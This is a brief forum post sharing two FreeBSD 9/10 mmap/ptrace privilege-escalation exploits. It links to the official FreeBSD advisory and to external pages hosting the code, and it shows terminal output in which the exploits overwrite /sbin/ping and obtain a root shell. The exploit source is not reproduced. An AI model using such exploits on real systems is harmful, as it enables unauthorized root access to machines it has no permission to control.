I've found these two pieces of code for privilege escalation. I've tested them on FreeBSD 10 and they work fine! x(
Info: http://www.mondounix.com/freebsd-mmap-privilege-escalation/
Advisory: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc
Test:
Code:
[user@freebsd10 ~]$ uname -a
FreeBSD freebsd10 10.0-CURRENT FreeBSD 10.0-CURRENT
Code:
[user@freebsd10 ~]$ ./b
[+] Saved old '/sbin/ping'
[+] Using mmap-ed area at 0x801000000
[+] Attached to 1264
[+] Copied 7435 bytes of payload to '/sbin/ping'
[+] Triggering payload
# id
uid=0(root) gid=0(wheel)
# exit
[+] Restoring '/sbin/ping'
[+] Done
Code: http://www.mondounix.com/freebsd-9-0-9-1-mmap-ptrace-exploit/
Code:
[user@freebsd10 ~]$ ./c
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger <fbsd9lul@hunger.hu>
# id
uid=0(root) gid=0(wheel)